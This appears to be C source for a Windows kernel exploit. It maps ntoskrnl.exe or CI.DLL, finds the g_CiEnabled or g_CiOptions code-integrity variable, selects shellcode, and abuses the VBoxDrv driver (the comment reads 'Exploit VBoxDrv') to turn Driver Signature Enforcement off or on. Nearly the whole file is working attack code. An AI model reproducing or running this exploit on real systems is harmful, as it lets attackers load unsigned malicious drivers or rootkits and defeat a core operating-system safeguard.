PVOID SfcabExtractMemory(
PVOID CabPtr,
ULONG CabSize,
PULONG ExtractedBytes
)
{
HFDI hfdi;
ERF erf;
CHAR text[32];
CHAR name[1];
PVOID Buffer = NULL;
CABDATA Data;
if (ExtractedBytes == NULL)
return NULL;
__try {
RtlSecureZeroMemory(&erf, sizeof(ERF));
hfdi = FDICreate((PFNALLOC)fdiAlloc, (PFNFREE)fdiFree, (PFNOPEN)fdiOpen, (PFNREAD)fdiRead,
(PFNWRITE)fdiWrite, (PFNCLOSE)fdiClose, (PFNSEEK)fdiSeek, cpu80386, &erf);
if (hfdi) {
g_CabParam.Buffer = CabPtr;
g_CabParam.Size = CabSize;
g_CabParam.Offset = 0;
RtlSecureZeroMemory(&text, sizeof(text));
#ifdef _WIN64
u64tostr_a((ULONG_PTR)&g_CabParam, text);
#else
ultostr_a((ULONG_PTR)&g_CabParam, text);
#endif
name[0] = 0;
Data.Size = '_';
Data.Buffer = NULL;
Data.Offset = 0;
if (FDICopy(hfdi, name, text, 0, fdiNotify, 0, &Data)) {
Buffer = Data.Buffer;
*ExtractedBytes = Data.Size;
}
FDIDestroy(hfdi);
}
}
__except (EXCEPTION_EXECUTE_HANDLER)
{
return NULL;
}
return Buffer;
}
VOID TestPrivateNamespace()
{
HANDLE hBoundaryDescriptor = NULL;
BOOL cond = FALSE;
SECURITY_ATTRIBUTES sa;
BYTE localAdminSID[SECURITY_MAX_SID_SIZE];
PSID pLocalAdminSID = &localAdminSID;
DWORD cbSID = sizeof(localAdminSID);
CHAR text[1000];
do {
RtlSecureZeroMemory(&localAdminSID, sizeof(localAdminSID));
hBoundaryDescriptor = CreateBoundaryDescriptor(TEXT("TestBoundaryDescriptor"), 0);
if (hBoundaryDescriptor == NULL) {
break;
}
if (!CreateWellKnownSid(WinBuiltinAdministratorsSid, NULL, pLocalAdminSID, &cbSID)) {
break;
}
if (!AddSIDToBoundaryDescriptor(&hBoundaryDescriptor, pLocalAdminSID)) {
break;
}
RtlSecureZeroMemory(&sa, sizeof(sa));
sa.nLength = sizeof(sa);
sa.bInheritHandle = FALSE;
if (!ConvertStringSecurityDescriptorToSecurityDescriptor(TEXT("D:(A;;GA;;;BA)"),
SDDL_REVISION_1, &sa.lpSecurityDescriptor, NULL)) {
break;
}
g_hNamespace = CreatePrivateNamespace(&sa, hBoundaryDescriptor, TEXT("Mynamespace2"));
LocalFree(sa.lpSecurityDescriptor);
if (g_hNamespace == NULL) {
ultostr_a(GetLastError(), text);
OutputDebugStringA(text);
break;
}
g_hMutex = CreateMutex(NULL, FALSE, TEXT("Mynamespace2\\TestMutex"));
} while (cond);
}
BOOL DoWork(
HANDLE hDevice,
BOOL bDisable
)
{
BOOL bRes = FALSE, bFound, cond;
ULONG rl = 0, c;
LONG rel = 0;
PVOID scBuffer = NULL, MappedKernel = NULL;
ULONG_PTR KernelBase = 0L;
SIZE_T ModuleSize;
PLIST_ENTRY Head, Next;
PLDR_DATA_TABLE_ENTRY Entry;
PRTL_PROCESS_MODULES miSpace;
CHAR KernelFullPathName[BUFFER_SIZE];
CHAR szOdsText[BUFFER_SIZE];
cond = FALSE;
do {
//
// Enumerate loaded drivers.
//
miSpace = supGetSystemInfo(SystemModuleInformation);
if (miSpace == NULL) {
break;
}
if (miSpace->NumberOfModules == 0) {
break;
}
RtlSecureZeroMemory(KernelFullPathName, sizeof(KernelFullPathName));
rl = GetSystemDirectoryA(KernelFullPathName, MAX_PATH);
if (rl == 0) {
break;
}
KernelFullPathName[rl] = (CHAR)'\\';
_strcpy_a(szOdsText, "[DF] Windows v");
ultostr_a(osv.dwMajorVersion, _strend_a(szOdsText));
_strcat_a(szOdsText, ".");
ultostr_a(osv.dwMinorVersion, _strend_a(szOdsText));
OutputDebugStringA(szOdsText);
//
// For vista/7 find ntoskrnl.exe
//
bFound = FALSE;
if (osv.dwMajorVersion == 6) {
if (osv.dwMinorVersion < 2) {
_strcpy_a(&KernelFullPathName[rl + 1],
(const char*)&miSpace->Modules[0].FullPathName[miSpace->Modules[0].OffsetToFileName]);
KernelBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
bFound = TRUE;
}
}
//
// For 8+, 10 find CI.DLL
//
if (bFound == FALSE) {
_strcpy_a(&KernelFullPathName[rl + 1], CI_DLL);
for (c = 0; c < miSpace->NumberOfModules; c++)
if (_strcmpi_a((const char *)&miSpace->Modules[c].FullPathName[miSpace->Modules[c].OffsetToFileName],
CI_DLL) == 0)
{
KernelBase = (ULONG_PTR)miSpace->Modules[c].ImageBase;
break;
}
}
HeapFree(GetProcessHeap(), 0, miSpace);
miSpace = NULL;
_strcpy_a(szOdsText, "[DF] Target module ");
_strcat_a(szOdsText, KernelFullPathName);
OutputDebugStringA(szOdsText);
_strcpy_a(szOdsText, "[DF] Module base ");
u64tohex_a(KernelBase, _strend_a(szOdsText));
OutputDebugStringA(szOdsText);
//
// Map ntoskrnl/CI.DLL in our address space.
//
MappedKernel = LoadLibraryExA(KernelFullPathName, NULL, DONT_RESOLVE_DLL_REFERENCES);
if (MappedKernel == NULL) {
break;
}
//
// Check if we are in NT6.x branch
//
if (osv.dwMajorVersion == 6) {
//
// Find g_CiEnabled Vista, Seven
//
if (osv.dwMinorVersion < 2) {
//
// Query module size via PEB loader for bruteforce.
//
ModuleSize = 0;
EnterCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);
Head = &NtCurrentPeb()->Ldr->InLoadOrderModuleList;
Next = Head->Flink;
while (Next != Head) {
Entry = CONTAINING_RECORD(Next, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
if (Entry->DllBase == MappedKernel) {
ModuleSize = Entry->SizeOfImage;
break;
}
Next = Next->Flink;
}
LeaveCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);
//
// Module not found, abort.
//
if (ModuleSize == 0) {
break;
}
rel = dsfQueryCiEnabled(&KernelBase, MappedKernel, (DWORD)ModuleSize);
}
else {
//
// Find g_CiOptions w8+
//
rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
}
}
else {
//
// Otherwise > NT6.x, find g_CiOptions 10+
//
rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
}
if (rel == 0)
break;
_strcpy_a(szOdsText, "[DF] Apply patch to address ");
u64tohex_a(KernelBase, _strend_a(szOdsText));
OutputDebugStringA(szOdsText);
//
// Select proper shellcode buffer
//
if (bDisable) {
scBuffer = (PVOID)scDisable;
}
else {
//
//Shellcode for for 8/10+
//
scBuffer = (PVOID)scEnable8Plus;
if (osv.dwMajorVersion == 6) {
//
//Shellcode for vista, 7
//
if (osv.dwMinorVersion < 2) {
scBuffer = (PVOID)scEnableVista7;
}
}
}
//
// Exploit VBoxDrv.
//
bRes = ControlDSE(hDevice, KernelBase, scBuffer);
} while (cond);
if (MappedKernel != NULL) {
FreeLibrary(MappedKernel);
}
if (miSpace != NULL) {
HeapFree(GetProcessHeap(), 0, miSpace);
}
return bRes;
}
